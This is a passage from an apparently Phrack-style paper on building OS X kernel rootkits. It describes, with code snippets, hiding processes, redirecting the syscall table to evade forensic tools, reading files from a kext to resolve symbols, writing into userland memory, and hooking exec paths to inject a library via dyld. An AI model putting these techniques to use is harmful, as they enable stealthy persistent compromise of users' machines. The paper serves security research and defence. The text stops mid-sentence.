last file entry name will be a "ttys" and we need to iterate fd_ofiles
array looking for the previous element to "ttys" - it is not lastfile-1.

It looks complicated but it is not and just a matter of looking up
the necessary information in kernel structures. The proc structure is
extremely rich and a good starting point for many hacks. The biggest
problem is being frequently changed between major OS X versions.

With so many kernel functions available it is almost certain there is
already a function that will avoid us to build the path as described
above. That function is vn_getpath() from bsd/sys/vnode.h.

/*!
 @function vn_getpath
 @abstract Construct the path to a vnode.
 @discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes
impossible to determine a vnode's full path. vn_getpath() will not enter
the filesystem.
 @param vp The vnode whose path to obtain.
 @param pathbuf Destination for pathname; should be of size MAXPATHLEN
 @param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
 will be strlen(pathbuf) + 1.
 @return 0 for success or an error code.
 */
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);

We still need to retrieve a vnode from the proc structure to use this
function. To find the vnode we can use the lastfile trick to find the
target path, retrieve its vnode and then use this function to get the
full path.

A better solution is to hide your data inside other data files that
can't be easily checksum'ed. Sqlite3 databases come to my mind [35].


----[ 2.5 - Hiding processes

The traditional way to hide processes is to remove them from the process
list maintained by the kernel. When an application requests the process
list, the rootkit intercepts and modifies the request. In this case,
only the results are modified and the underlying structures are still
intact. A rootkit detection tool can access those structures and compare
with the results.

Another possibility is to remove the processes from the process list. This
time a tool that is based on those structures information will not be
able to detect the inconsistency because there is none (regarding only
the proc list, because there is data in other structures that can be
used to signal inconsistencies).

Due to OS X design, things are a bit more fun (or complicated) because
the BSD layer runs on top of XNU layer. The basic process units are Mach
tasks and threads and there's a one-on-one mapping between BSD processes
and Mach tasks. The task is just a container and Mach threads are the
units that execute code. What matters for this case is that there is
an additional list where inconsistencies can be detected - the Mach
tasks list. Using an ascii version of nofate's diagram found at [3]:

 proc <-> proc  <-> proc  <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

The version with a hidden process at the BSD layer:

 proc <------------> proc <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

Each BSD process has reference to the Mach tasks list via a void pointer
and vice-versa. Transversing both lists can detect the inconsistency
described above and most certainly flag an installed rootkit (it is
possible to have a Mach task without a corresponding BSD process).

struct proc {
(...)
    void *task;     /* corresponding task (static) */
(...)
}

struct task {
(...)
    void *bsd_info; /* the corresponding proc_t */
(...)
}

The (not so new) lesson to extract from this is that there many points to
be used for detecting inconsistencies in the system. These are hard to
hide if the goal is to hide one or more rogue processes. A much better
solution is to piggyback into normal processes, where detection is a
bit harder - it can be a normal process with an extra thread running
for example. The piggyback solution will be used later to run userland
commands from the kernel.


----[ 2.6 - Modifying the syscall handler

A common technique to hide modifications to syscall table is to make a
copy and modify the syscall handler to point to this new one. Rootkit
detection utils that just verify the *legit* table are unable to detect
it. There's nothing new about this technique although I have never seen it
in use in OS X. It is a good opportunity to describe how to implement it.

The interrupt 0x80 is handled by the assembly function
idt64_unix_scall [osfmk/x86_64/idt64.s]. The IDT table definition
[osfmk/x86_64/idt_table.h] confirms this and can be runtime verified by
querying the IDT and extracting the address of int80 handler.

USER_TRAP_SPC(0x80,idt64_unix_scall)

Follow the idt64_unix_scall assembler code. The switch to C happens
when unix_syscall[64] function is called, both for interrupt 0x80 and
sysenter/systrap system calls. This code path opens many opportunities
to change pointers, or install trampolines and redirect code to rootkit's
implementation.

One such possibility is to change the table pointer inside
unix_syscall[64]. This is sample code from the 64 bits version:

(...)
    code = regs->rax & SYSCALL_NUMBER_MASK;
    DEBUG_KPRINT_SYSCALL_UNIX(
        "unix_syscall64: code=%d(%s) rip=%llx\n",
        code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip);
    callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
    uargp = (void *)(&regs->rdi);
(...)
    AUDIT_SYSCALL_ENTER(code, p, uthread);
    error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
    AUDIT_SYSCALL_EXIT(code, p, uthread, error);
(...)

Disassembly output (here I renamed memory references in IDA since they
have no symbols associated):

loc_FFFFFF80005E169C:
4C 03 2D 2D EA 21 00            add     r13, cs:sysent
4C 3B 2D 26 EA 21 00            cmp     r13, cs:sysent
74 0B                           jz      short loc_FFFFFF80005E16B7

The sysent reference is to:

__DATA:__got:FFFFFF80008000D0 40 58 85 00 80 FF FF FF sysent   dq offset
sysent_table

To directly find the location of sysent in the __got section is very
easy. Find out the location of sysent table using one of the section 2
techniques (or some other) and then search the __got section for that
address (to find the location and boundaries of __got section we just
need to read kernel's Mach-O header).

The easiest way to redirect sysent is to modify that pointer to our
modified copy. A (memory) forensic tool that (only) searches for and
lookups the original sysent table will fail to detect this and the next
trick. For example, Volafox v0.8 is vulnerable. Volatility's Mac version
at the time of writing has yet no sysent plugin available.

Another way is to modify the code reference to __got section and instead
point it to somewhere else. This is very easy to implement with diStorm's
assistance.

Disassemble the unix_syscall[64] functions and lookup for references to
__got address. The instructions that need to be matched are ADD and CMP
(this assumption appears to hold always true). To calculate the RIP target
address, diStorm has a helper macro called INSTRUCTION_GET_RIP_TARGET().
If the RIP address matches the __got address the offset can be updated.
Calculate the offset to the address that contains the pointer to the
new table and update it at the instruction that referenced the old
__got pointer.

One last (important!) detail. RIP addressing uses a 32 bits offset,
which appears to be enough to reference the new sysent (dynamically or
statically allocated) in most cases. This might not always be true -
from my experience the distance is very near the signed int limit.

One way to make this safer is to put the pointer in kernel's memory
space. This can be alignment space, Mach-O header (for the lulz!), or
somewhere else (it is just a data pointer so no need for exec permission).


--[ 3 - Reading the filesystem from kernel land

Now let's get going with the fun stuff that opens the door to even
funnier stuff!

One of the annoying obstacles that Apple introduced against development
of rootkits is the lack of kernel's full __LINKEDIT segment up to Snow
Leopard. Useful symbols for rootkit development are also not exported. No
one said rootkit development was easy - fun but not always easy.

Possible solutions are to solve the symbols from userland, and pattern
search from the kext - this one easily susceptible to failure due to
changing patterns in kernel versions and compilers.

For example, OS.X/Crisis spyware adopts a mixed approach. Most symbols
are solved from the userland agent and communicated thru a character
device to the rootkit, but sLoadedKexts is solved with byte search -
starting point is still a symbol solved from userland.

The easiest solution to this problem is to read the kernel file
(/mach_kernel) from the rootkit and process the symbol table, as it is
done from userland. The extracted addresses need to be fixed with the
kernel ASLR slide but that is easily bypassed as described in section 2.2.

As far as I know no publicly known OS X rootkit ever implemented arbitrary
filesystem read, and probably very few to none in other platforms (TDSS
being the most famous in Windows). There is some kind of myth about the
difficulty of implementing this or something else that made rootkits
developers avoid it. I must confess I was influenced by that "myth"
and never bothered to give it a try before this article.

In practice the implementation is extremely easy! Sometimes you just
need to be in the right mood and give it a try.

Two methods will be shown, one very easy based on exported symbols (and
a copy of a very stable private extern kernel function), and another a
bit more complex that requires some unexported symbols. Both are based in
VFS - the obvious and easiest way to achieve our goal. Other functions
can be used so many variations are possible. That is left open for you
to explore, I still have a lot to write about in this paper :-)


----[ 3.1 - Real short overview of VFS

The Virtual-Filesystem Interface was introduced in 4.4BSD and first
implemented by Sun Microsystems. Before this innovation file entries
directly referenced filesystem inodes. This method does not scale well
if there's more than a filesystem type.

VFS is an additional extensible object-oriented layer that introduces
an abstraction of the underlying filesystem, making it easy to support
multiple filesystems. Instead of inodes there are vnodes. There is no
need to deal with the intricacies of multiple filesystems - we can use
the VFS related functions and let the kernel do the filesystem operations
"dirtywork".

The most interesting VFS related structures to our purposes are:
- struct filedesc: defined at bsd/sys/filedesc.h, represents the open files
in a process.
- struct fileproc: defined at bsd/sys/file_internal.h, represents each open
file.
- struct fileglob: defined at bsd/sys/file_internal.h, contains all the
information associated to a file, including vnode and supported filesystem
operations.
- struct vnode: defined at bsd/sys/vnode_internal.h.

Detailed references about the design and implementation can be found at
[20], [14] and [13].


----[ 3.2 - The easy way - Apple loves rootkit authors!

The first piece of information that we need is the vnode of the target
file we want to read. We already seen in section 2.4 that this information
is available in proc_t structure but we can follow an easier path!

One suitable function is vnode_lookup() (available in BSD KPI). It is
defined at bsd/vfs/vfs_subr.c in XNU source code, and well documented
at bsd/sys/vnode.h include:

/*!
 @function vnode_lookup
 @abstract Convert a path into a vnode.
 @discussion This routine is a thin wrapper around xnu-internal lookup
routines; if successful, it returns with an iocount held on the resulting
vnode which must be dropped with vnode_put().
 @param path Path to look up.
 @param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
              VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
 @return Results 0 for success or an error code.
 */
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);

The arguments are the path for the target file, search flags, a vnode_t
pointer for output and the vfs context for the current thread (or kernel
context).

The vfs context can be obtained using the function vfs_context_current()
but it is only available in the Unsupported KPI - subject to whatever
Apple wants to do with it so not stable enough for our purposes. In
practice the vfs context is not a problem because Apple (or BSD's
original code) took good care of us. Let me show you why with kernel's
implementation of vnode_lookup():

errno_t
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
{
    struct nameidata nd;
    int error;
    u_int32_t ndflags = 0;

    if (ctx == NULL) {      /* XXX technically an error */
        ctx = vfs_context_current(); // <- thank you! :-)
    }
(...)
}

Apple's love means that we just need a simple operation to retrieve
kernel's vnode:

#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);

One important detail is that vnode_lookup() will increase the iocount on
the target vnode (in case you missed above note from vnode_lookup). We
must release it using vnode_put() when we do not need it anymore (after
reading or writing what we want). This function is also available in
the BSD KPI.

Having kernel's vnode information we can finally read its contents from
the rootkit. To do that we can use the VNOP_READ() function - documented
and declared at bsd/sys/vnode_if.h.

/*!
 @function VNOP_READ
 @abstract Call down to a filesystem to read file data.
 @discussion VNOP_READ() is where the hard work of of the read() system
call happens. The filesystem may use  the buffer cache, the cluster layer,
or an alternative method to get its data; uio routines will be used to see
that data is copied to the correct virtual address in the correct address
space and will update its uio argument to indicate how much data has been
moved.
 @param vp The vnode to read from.
 @param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
 @param ctx Context against which to authenticate read request.
 @return 0 for success or a filesystem-specific error. VNOP_READ() can
return success even if less data was read than originally requested;
returning an error value should indicate that something actually went
wrong.
 */
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);

The last missing piece is an uio structure. To create that buffer we
can use three other functions: uio_create(), uio_createwithbuffer()
and uio_addiov().

Two are available in BSD KPIs - uio_create and uio_addiov. The other
one, uio_createwithbuffer is private extern and used by uio_create. We
can rip its implementation into our rootkit code from XNU source file
bsd/kern/kern_subr.c. It's simple and stable enough to make this possible
(never modified in all latest OS X versions).

Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().

An example how to create the required structure to hold a 4kbytes page:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

The same example using uio_createwithbuffer:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
 sizeof(uio_buf));
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

First create the uio buffer, and then add it else it can't be used.
The data buffer can be a statically allocated buffer (as above) or
dynamically allocated using _MALLOC() or other available kernel variant.

Having the uio buffer created the last step is to execute the read:

error = VNOP_READ(kernel_vode, uio, 0, NULL);

If successful, the buffer will contain the first page (4096 bytes) of
/mach_kernel OS X kernel read into data_buffer.

A good implementation reference of this process is the kernel function
dqfileopen() [bsd/vfs/vfs_quota.c].


----[ 3.3 - The more complex way

This second approach was in fact how I started to explore this problem
and before I learnt about vnode_lookup(). It is a good backup method
but the learning experience and some techniques used to obtain some
information are the interesting bits here.

Its biggest inconvenience is that it requires the unexported symbol
VNOP_LOOKUP(). This function requires diferent arguments but has the
same functionality as vnode_lookup() - to lookup the vnode of a file
or directory. Documentation can be found at bsd/sys/vnode_if.h.

/*!
 @function VNOP_LOOKUP
 @abstract Call down to a filesystem to look for a directory entry by name.
 @discussion VNOP_LOOKUP is the key pathway through which VFS asks a
filesystem to find a file. The vnode should be returned with an iocount to
be dropped by the caller. A VNOP_LOOKUP() calldown can come without a
preceding VNOP_OPEN().
 @param dvp Directory in which to look up file.
 @param vpp Destination for found vnode.
 @param cnp Structure describing filename to find, reason for lookup, and
various other data.
 @param ctx Context against which to authenticate lookup request.
 @return 0 for success or a filesystem-specific error.
 */
#ifdef XNU_KERNEL_PRIVATE
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
vfs_context_t);
#endif /* XNU_KERNEL_PRIVATE */

The first argument is the vnode of the directory where the target file
is located. It is a kind of a chicken and egg problem because we do not
have that information - we want it! Do not fear, this information can
be extracted from somewhere else. As previously described, the proc
structure contains the field p_fd - pointer to open files structure
(struct filedesc).

The filedesc structure has two interesting fields for our purposes:

1) fd_ofiles - an array of file structures for open files.
2) fd_cdir   - vnode structure of current directory.

There is also fd_rdir, which is the vnode of root directory but from my
tests it is usually NULL.

The proc structure is a doubly-linked list - we can "walk" around it and
retrieve information of any process. In OS X, the kernel is just another
Mach task with PID 0 and a corresponding proc entry - before Leopard
we could access kernel task via task_for_pid(0), which allowed DKOM
(direct kernel object manipulation). The mach_kernel file is located at
the root directory /.

The proposed procedure is to traverse the proc structure and find pid 0
(field p_pid). When found, the field fd_cdir will contain what we need -
the vnode for the root directory.

Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We
need an alternative way! Two solutions: complicated and straightforward.

Recalling what was already described in section 2.4. Kernel's
implementation of syscall functions has a struct proc * as first
parameter. Using open() as example:

open(struct proc *p, struct open_args *uap, int *retval)

What we can do is to temporarily (or not) hijack a syscall via sysent
table and get a reference to any proc_t. Since it is a doubly-linked
list we can traverse it and find PID 0. When found we can extract the
vnode pointer for current directory and that is it.

The kernel does not keep /mach_kernel open so the field fd_ofiles is
not useful. Luckly for us the fd_cdir is populated with the information
we need - vnode of root directory /.

The kernel knowledgeable reader knows there is no need for all this
mess to retrieve a proc_t structure. There is a BSD KPI function that
solves the problem with a single call, proc_find(). Its prototype is:
proc_t proc_find(int pid)

Kernel is just another task with PID 0, so just execute proc_find(0)
and get the required structure pointer. This will increase the reference
count and must be released using proc_rele(). Very easy, right? :-)

Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current()
but there is a better function that I found out while writing this
section. It is vfs_context_create(), available in BSD KPI.

/*!
 @function vfs_context_create
 @abstract Create a new vfs_context_t with appropriate references held.
 @discussion The context must be released with vfs_context_rele() when no
longer in use.
 @param ctx Context to copy, or NULL to use information from running
thread.
 @return The new context, or NULL in the event of failure.
 */
vfs_context_t vfs_context_create(vfs_context_t);

We can use this function to create a new context and pass it to
VNOP_LOOKUP(). The next step is to create a struct componentname
[bsd/sys/vnode.h].

struct componentname {
     // Arguments to lookup.
    uint32_t    cn_nameiop;     /* lookup operation */
    uint32_t    cn_flags;       /* flags (see below) */
    void        *cn_reserved1;  /* use vfs_context_t */
    void        *cn_reserved2;  /* use vfs_context_t */
    // Shared between lookup and commit routines.
    char        *cn_pnbuf;      /* pathname buffer */
    int         cn_pnlen;       /* length of allocated buffer */
    char        *cn_nameptr;    /* pointer to looked up name */
    int         cn_namelen;     /* length of looked up component */
    uint32_t    cn_hash;        /* hash value of looked up name */
    uint32_t    cn_consume;     /* chars to consume in lookup() */
};

A small example to lookup /mach_kernel:

 struct componentname cnp;
 char tmpname[] = "mach_kernel";
 bzero(&cnp, sizeof(cnp));

 cnp.cn_nameiop = LOOKUP;
 cnp.cn_flags = ISLASTCN;
 cnp.cn_reserved1 = vfs_context_create(NULL);
 cnp.cn_pnbuf = tmpname;
 cnp.cn_pnlen = sizeof(tmpname);
 cnp.cn_nameptr = cnp.cn_pnbuf;
 cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?

Now we are ready to call VNOP_LOOKUP() and use the returned vnode
information to execute VNOP_READ() as in section 3.1 (do not forget to
create first the UIO buffer).

Last but not least, there is another function we can (ab)use to read files
- vn_rdwr(). It was this function that triggered my curiosity about this
process while reading about the execution flow of a Mach-O binary. The
parameters it requires can be retrieved or created with the techniques
above described or others you might come up with. Feel free to implement
it and discover alternative ways to read the files (there are more!).

Writing is not harder than reading. Just browse the source files mentioned
in this section and the functions you need will be obvious. You can
apply the techniques here described to fill the required parameters.


----[ 3.4 - Solving kernel symbols

Snare on his blog post [5] explains in detail how to solve the kernel
symbols. The only difference is that instead of reading directly from
kernel memory we have the information in temporary buffers with data
read from the filesystem.

The proposed workflow is:

1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
   - From __TEXT segment: vmaddr field (for ASLR slide computation).
   - From __LINKEDIT segment: fileoff and filesize (so we can read the
   segment).
   - From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
   Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can
be computed by the difference between running __TEXT vmaddr and the one
read from disk.

There is no need to read the whole mach_kernel file into kernel space,
we just need the headers and __LINKEDIT segment, around 1MB, smaller
than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at
a premium :-)


--[ 4 - Executing userland binaries from the kernel

This section describes a technique to execute userland processes
from a kernel extension (not tested but should also be valid from
IOKit drivers). For this purpose wowie and ghalen used the KUNC API
(Kernel-User Notification Center), a straightforward interface to execute
userland executables. One problem with KUNC is that the required symbols
are provided by the Unsupported KPI and Apple has the following note:
The Kernel-User Notification Center APIs are not available to KEXTs that
declare dependencies on the sustainable kernel programming interfaces
(KPIs) introduced in OS X v10.4.

Having different ways to accomplish a given goal is more fun and
improves knowledge, which is this paper's main goal. The technique to be
presented is probably not the most efficient one but it is a good learning
experience about playing with kernel and how everything is implemented.


----[ 4.1 - Writing from kernel memory into userland processes

The first step is to find a way to write to userland process addresses
from a kernel extension. In userland there is the mach_vm_write() function
(or older vm_write()) to write to any arbitrary process, assuming we
have the right permissions to do so (task_for_pid() is our friend).

Its prototype is:

kern_return_t mach_vm_write(vm_map_t target_task,
mach_vm_address_t address, vm_offset_t data,
mach_msg_type_number_t dataCnt);

If you look at the definition of the task structure (a void* at proc
structure but defined at osfmk/kern/task.h) you can find the first
parameter to mach_vm_write in the "map" field. The remaining parameters
are the target address, the data buffer to write and its size.

Do not forget that we need first to use mach_vm_protect (or vm_protect)
to change memory protections if trying to write to the read-only
segments/sections.

The problem with this approach is that it does not work!
The memory protection is changed but mach_vm_write() does not modify the
target address. The answer is that if called like this we are trying
to write data from kernel space directly to the userland space, which
should (obviously!) fail. Remember we need to use copyin/copyout to
copy between the two spaces.

We need another solution and I will present not one but two, both easy
to use. Thanks go to snare for giving me some initial sample code from
his own research.

The first solution uses three functions, vm_map_copyin(),
vm_map_copyout(), and mach_vm_copy(). You can read their description at
osfmk/vm/vm_map.c and vm_user.c in XNU sources.

vm_map_copyin creates an object from a given address located in a given
map that we can insert into another address space. This assures the
correct transition between kernel and user virtual memory spaces.

The vm_map_copyout() function copies the object into the target map,
aka, our target process. We need the vm_map_t info for kernel and target
process - both can be found by iterating proc list or proc_find(),
as previously described.

There is one important detail about vm_map_copyout! It injects the object
"into newly-allocated space in the destination map". What this means is
that we are just copying the data into a new memory address at the user
process and not at the target address we want. Let me show you with an
example of what happens using that command:

char *fname = "nemo_and_snare_rule!";
kern_return_t kr = 0;
vm_map_address_t dst_addr;

kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);
kr = vm_map_copyout(task->map, &dst_addr, copy);

dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:

sh-3.2# ./readmem -p 121 -a 0x11fa000 -s 32
[ Readmem v0.4 - (c) fG! ]
--------------------------
Memory protection: rw-/rwx

0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............

At this point we need to copy the contents to the target address we
want to. This can be achieved using mach_vm_copy() - a function that
copies one memory region to another within the same task. The address
where the data was copied to can be found at the second parameter of
vm_map_copyout().

It must be noticed that the first two functions are available as
Private KPIs and mach_vm_copy() is not exported (I cheated in above's
example). Not a big problem since we can easily solve the symbols.

The sample code to write to the Mach-O header of a 32 bits, no ASLR
binary could be something like this:

// get proc_t structure and task pointers
struct proc *p = proc_find(PID);
struct proc *p_kernel = proc_find(0);
struct task *task = (struct task*)(p->task);
struct task *kernel_task = (struct task*)(p_kernel->task);
kern_return_t kr = 0;
vm_prot_t new_prot = VM_PROT_WRITE | VM_PROT_READ;
kr = mach_vm_protect((vm_map_t)task->map, 0x1000, len, FALSE, new_prot);

vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;

// create a vm_map_copy_t object so we can insert it at userland process
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);

// copy the object to userland, this will allocate a new space into target
// map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));

// and now we can use mach_vm_copy() because it copies data within the same
// task
kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
proc_rele(p);
proc_rele(p_kernel);

To deallocate that new allocated space in userland vm_map_remove()
is a good candidate:

/*
 * vm_map_remove:
 * Remove the given address range from the target map.
 * This is the exported form of vm_map_delete.
 */
extern kern_return_t
vm_map_remove(vm_map_t         map,
              vm_map_offset_t  start,
              vm_map_offset_t  end,
              boolean_t        flags);

An easy alternative is to just zero those bytes and assume that space
as a small memory leak. It works and it is not a big deal.

The second solution requires a single function and has no
memory allocation at the target process. We are talking about
vm_map_write_user(): "Copy out data from a kernel space into space in
the destination map. The space must already exist in the destination map."

The prototype:
kern_return_t
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);

Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
function:
struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
proc_rele(p);

This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.

After so many words you are probably asking why not use copyout to copy
from kernel to userland? Well, of course it is possible but there is
a problem. It can't be used to overwrite to arbitrary processes - only
against the current process. Even if we try to change the current map to
another process using vm_map_switch(), copyout will always retrieve the
current process so copyout will fail with EFAULT if we try an address
of another process that does not exists in current. This means that it
can be used, for example, inside a hooked syscall but not to write to
arbitrary processes.


----[ 4.2 - Abusing (again!) dyld to inject and run code

Most of the time hacking is about abusing features or lack-of. This
time we are going to piggyback on dyld and launchd. Poor bastards!
The idea is that launchd will restart our target process and dyld will
be responsible for executing our code. I used the dyld approach in
OS.X/Boubou PoC described at [12] and [34], so why not again? It is easy
to implement and works very well.

The core of this idea is to emulate the DYLD_INSERT_LIBRARIES (equivalent
to LD_PRELOAD for those coming from ELF Unix world) when a new process
is created. The library will be responsible for executing whatever
we want to. In this case we want to modify the Mach-O header before
passing control to dyld. When dyld gains control (it is dyld who passes
control to target's entrypoint not the kernel) it will read the header
from target's memory and process it. This presents an opportunity to
successfully modify and inject the Mach-O header.

The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O
header details and injection process. This is valid for dynamically
linked executables, where execution will start at the dynamic linker
(/usr/lib/dyld) and then continue at the executable entry point.

Launchd is the perfect target because it can automatically respawn daemons
and agents, at root or user privilege level. The idea is to kill a daemon,
intercept the respawn and inject the library we want to be executed. The
privilege level we want to execute at depends on the target daemon.

What we need is to find a good place to intercept the respawn of the
target process and modify its memory before control is passed to dyld.

A simplified version of the binary execution process, adapted from [13] is:

     execve() -> __mac_execve()
                        |
                        v
               exec_activate_image()
                        |
                        v
                    Read file
                        |
                        v
           .----> exec_mach_imgact() -> run dyld -> target entry point
           |            |
           |            v
           |       load_machfile()
           |            |
           |            v
           |      parse_machfile()   [maps the load commands into memory]
           |            |
           |            v
           |       load_dylinker()   [sets image entrypoint to dyld]
           |            |
           |            v
           `--------- (...)

Chapter 7 of [14] and Chapter 13 of [13] thoroughly describe the execution
process in case you are interested in every detail.

The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse again the Mach-O header so our modification is
guaranteed to be used if made before dyld's control.

We can confirm this by looking at dyld source code [15]:

//
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start
// which sets up some registers and call this function.
//
// Returns address of main() in target program which __dyld_start jumps to
//
uintptr_t
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
        int argc, const char* argv[], const char* envp[],
        const char* apple[], uintptr_t* startGlue)

One curious detail (without any practical application I can foresee
now) is that dyld does not validate the header - the magic value can
be modified to anything and dyld will happily continue its work. Kernel
data can be trusted, right?


----[ 4.3 - Finding the place to execute the injection

With theory in place it is finally time to move to practice! We need
to find one or more places where we can modify the target process memory
and inject our dynamic library.

The kernel has no symbol stubs so we can't just modify a pointer and
hijack a useful function. One solution is to inline hook the function
prologue and make it jump to our function. We can simplify this by
implementing the whole original function (copy from XNU source into our
rootkit); this way we do not need to return back to the original one,
just restore the original bytes when we finish our evil work.

A good starting point to look for candidate functions is
exec_mach_imgact(). The reason why is that when it returns control
to dyld everything required to execute the new process is set (kernel
side). As much as possible near its end is best.

After exploring exec_mach_imgact, I found a good candidate at
task_set_dyld_info(). It is called twice, one before the image is loaded
into memory, and another after the image is loaded. Clearly, the former
does not interest us so we need to distinguish between each case. This
function is only used at exec_mach_imgact().

Looking at its code in osfmk/kern/task.c:

void
task_set_dyld_info(task_t task, mach_vm_address_t addr,
mach_vm_size_t size)
{
    task_lock(task);
    task->all_image_info_addr = addr;
    task->all_image_info_size = size;
    task_unlock(task);
}

The locks calls are nothing else than macros using a symbol available in
KPIs:

#define task_lock(task)     lck_mtx_lock(&(task)->lock)
#define task_unlock(task)   lck_mtx_unlock(&(task)->lock)

It is a great candidate - we can copy & paste its code into our
rootkit source, add our code to inject the library and then execute
the original function code. Because it is not a static function we can
find its symbol. The first parameter is a task_t structure, which has
a pointer to the correspondent proc_t structure (remember that proc and
task structures are connected to each other via void pointers).

The proposed workflow could be:

1) Find task_set_dyld_info() address.
2) Patch prologue to jump to our function.
3) Execute our function to inject library.
4) Restore original bytes from 2).
5) Execution continues, our library is executed by dyld.

The only problem with this function is here at exec_mach_imgact():

    /*
     * Remember file name for accounting.
     */
    p->p_acflag &= ~AFORK;
    /* If the translated name isn't NULL, then we want to use
     * that translated name as the name we show as the "real" name.
     * Otherwise, use the name passed into exec.
     */
    if (0 != imgp->ip_p_comm[0]) {
        bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
            sizeof(p->p_comm));
    } else {
        if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
            imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
        bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
            (unsigned)imgp->ip_ndp->ni_cnd.cn_namelen);
        p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
    }

The process name in proc_t structure is only set after the second call
to task_set_dyld_info(), so we can't use it to detect which process
is going to be executed and trigger or not our injection (remember we
are only interested in a specific process to be executed by launchd). A
workaround to this problem is to lookup the open files structure in proc_t
(p_fd field).

An alternative solution is to use another function! There is
an even better one near the end of exec_mach_imgact() called
proc_resetregister(). The advantage of being near the end is that we can
change a lot more things (kernel completed most of its tasks related to
new process execution), opening way for some cute tricks.

Its implementation is also very simple [bsd/kern/kern_proc.c]:

void proc_resetregister(proc_t p)
{
    proc_lock(p);
    p->p_lflag &= ~P_LREGISTER;
    proc_unlock(p);
}

The lock/unlock here are implemented as functions instead of macros and
not exported. We can simply define the macros or change our code to
use lck_mtx_*. This time we have a proc_t structure and can use the
p_comm field to find our target(s) (or proc_name() to get the name of
a given pid). Perfect spot!

With a location where to execute our modifications we can proceed to
the last step, modify the target Mach-O header.


----[ 4.4 - Ideas are great, execution is everything

Assuming that our hijacked function is proc_resetregister(), we can
extract all the information we will need from the proc_t parameter. Let's
proceed with this.

The number of binaries that use ASLR is increasing so the first step is to
find at which memory address is the binary loaded (the Mach-O header to be
more specific). The ASLR slide is generated inside load_machfile() and not
set in a struct/var or returned. One way to solve the problem is to take a
peak at the virtual memory map (vmap) of the target process. The following
does the job (assuming we are inside our own proc_resetregister()):

struct task *task = (struct task*)p->task;
mach_vm_address_t start_address = task->map->hdr.links.start;

Start contains the lower address of the process, which is where the
Mach-O header is located at. This *appears* to hold always true (there
are good reasons to believe it!).

To modify the Mach-O header of the target process we need to parse
